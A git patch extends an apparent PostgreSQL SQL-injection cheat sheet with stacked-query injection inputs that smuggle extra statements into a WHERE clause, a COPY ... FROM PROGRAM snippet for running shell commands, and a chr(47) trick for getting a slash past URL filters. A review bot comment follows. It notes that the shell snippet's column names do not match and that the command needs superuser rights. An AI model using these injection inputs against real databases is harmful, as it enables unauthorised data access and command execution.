From dfe56b4c377dcf4e93b633089a09f753c0ff6c30 Mon Sep 17 00:00:00 2001
From: Mahmood Azadi <90643392+libertyir@users.noreply.github.com>
Date: Sat, 18 Sep 2021 18:13:59 +0430
Subject: [PATCH] Update Postgres_SqlInjecttions.sql

---
 Postgres_SqlInjecttions.sql | 30 ++++++++++++++++++++++++++++++
 1 file changed, 30 insertions(+)

diff --git a/Postgres_SqlInjecttions.sql b/Postgres_SqlInjecttions.sql
index 4452337..fc25099 100644
--- a/Postgres_SqlInjecttions.sql
+++ b/Postgres_SqlInjecttions.sql
@@ -45,6 +45,36 @@ select (table_name || ' : ' || (select string_agg(column_name, ',') from informa
 --| table2 : field1 |
 ------------------------------------
+--Multiple Select Table in single text
+--*************************************************
+-- Field1 int,field2 text,field3 datetime
+select string_agg(cast(COALESCE(txt1,'') as text) , '
') from (select cast(COALESCE(field1,'0') as text) || ',' || cast(COALESCE(field2,'') as text) || ',' || cast(COALESCE(field3,now()) as text) as txt1 from table1) as tbl1 + + +--execute command delete/update/exec/function in command +--************************************************* +-- orginal select * from table1 where field1 = $input +-- $input = '; select 1;exec sp_1; select fn_test(''); -- + + +-- orginal select * from (select * from table1 where field1 = $input group by field2) +-- $input = group by field2'; select 1;exec sp_1; select fn_test(''); select * from table1 where 1=2 and ''=' + + +--Shell Execute +--************************************************* +Create table pg_test (cmdr text); +COPY pg_test (command_output) FROM PROGRAM 'echo 123'; +select cmdr from pg_test + + +--bypass / and \ in url +--************************************************* +select replace('ls !', '!',chr(47)) + + + +
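Review bot: The column named in `COPY pg_test (command_output) FROM PROGRAM 'echo 123';` does not match the column declared two lines earlier by `Create table pg_test (cmdr text);`, so the Shell Execute snippet fails as written; the two statements have to agree on the column name. The section also leaves out the precondition that matters most when assessing exposure: `COPY ... FROM PROGRAM` is only permitted for a superuser or a member of the predefined role `pg_execute_server_program` (PostgreSQL 11 and later), so an application role without that membership never reaches this path, and the statement is visible as an ordinary COPY in statement logging or pgAudit when those are enabled. I would add `-- requires superuser or membership in pg_execute_server_program; logged as a COPY statement` above the `COPY` line. Separately, `datetime` in the `-- Field1 int,field2 text,field3 datetime` comment is not a PostgreSQL type (`timestamp` is), and the literal newline used as the `string_agg` delimiter would read more clearly as `E'\n'`.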